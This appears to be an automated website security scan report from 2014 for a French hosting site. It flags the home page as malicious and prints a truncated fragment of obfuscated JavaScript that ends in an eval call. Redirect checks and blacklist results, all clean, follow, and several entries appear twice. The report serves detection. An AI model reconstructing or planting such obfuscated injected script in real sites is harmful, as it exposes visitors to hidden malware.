Scanned pages/files
Request | Server response | Status |
http://lacledusucces.com/ | 200 OK Content-Length: 33854 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var WH9Ri1Tx="9M5164M51R28M";var UDflhRL="DM5164M";var vbHMAgLN="yw6Hy6wHy79Hy6";var g507zG="ce(/M51/g,'%";var PirUVF="d%2F3Md%66";var MEa8="3Md%693Md%613Md";var iBZ79HM="%703Md";var B0SCnI="M51ci%6M5161M5";var fLqFAjl="z.replace";var rV1G8F="place(";var j334uwQ0="5154M5153M51R2";var tba9puL="ywp6Cywp";var WGPXHiAh="B';eval(u";var m4j9VB="5165M516EM";var zj8XDT="p27ywp";var O1YG9nr="165M51R2ci%M5";var A0typu1w="));var P";var IzVJ="wHy61Hyw8Hy53";var vR9HMJ="29M513B";var d8QR="(djsZ.replace(";var Antivirus reports:
| ||
http://lacledusucces.com/index.html | 200 OK Content-Length: 33854 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var WH9Ri1Tx="9M5164M51R28M";var UDflhRL="DM5164M";var vbHMAgLN="yw6Hy6wHy79Hy6";var g507zG="ce(/M51/g,'%";var PirUVF="d%2F3Md%66";var MEa8="3Md%693Md%613Md";var iBZ79HM="%703Md";var B0SCnI="M51ci%6M5161M5";var fLqFAjl="z.replace";var rV1G8F="place(";var j334uwQ0="5154M5153M51R2";var tba9puL="ywp6Cywp";var WGPXHiAh="B';eval(u";var m4j9VB="5165M516EM";var zj8XDT="p27ywp";var O1YG9nr="165M51R2ci%M5";var A0typu1w="));var P";var IzVJ="wHy61Hyw8Hy53";var vR9HMJ="29M513B";var d8QR="(djsZ.replace(";var Antivirus reports:
| ||
http://lacledusucces.com/hebergement.html | 200 OK Content-Length: 36075 Content-Type: text/html | clean |
http://lacledusucces.com/support.html | 200 OK Content-Length: 16431 Content-Type: text/html | clean |
http://lacledusucces.com/apropos.html | 200 OK Content-Length: 15941 Content-Type: text/html | clean |
http://lacledusucces.com/domaines.html | 200 OK Content-Length: 15213 Content-Type: text/html | clean |
http://lacledusucces.com/termes.html | 200 OK Content-Length: 13890 Content-Type: text/html | clean |
http://lacledusucces.com/contact.html | 200 OK Content-Length: 13431 Content-Type: text/html | clean |
http://lacledusucces.com/index-6.html | 404 Not Found Content-Length: 329 Content-Type: text/html | clean |
http://lacledusucces.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: lacledusucces.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Aug 2014 11:12:20 GMT
Accept-Ranges: bytes
ETag: "2d029b-843e-4138935543140"
Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/0.9.7a mod_bwlimited/1.4
Content-Length: 33854
Content-Type: text/html
Last-Modified: Thu, 11 May 2006 20:38:53 GMT
...33854 bytes of data.
GET / HTTP/1.1
Host: lacledusucces.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Aug 2014 11:12:20 GMT
Accept-Ranges: bytes
ETag: "2d029b-843e-4138935543140"
Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/0.9.7a mod_bwlimited/1.4
Content-Length: 33854
Content-Type: text/html
Last-Modified: Thu, 11 May 2006 20:38:53 GMT
...33854 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: lacledusucces.com
Referer: http://www.google.com/search?q=lacledusucces.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: lacledusucces.com
Referer: http://www.google.com/search?q=lacledusucces.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=lacledusucces.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://lacledusucces.com/
Result: lacledusucces.com is not infected or malware details are not published yet.
Result: lacledusucces.com is not infected or malware details are not published yet.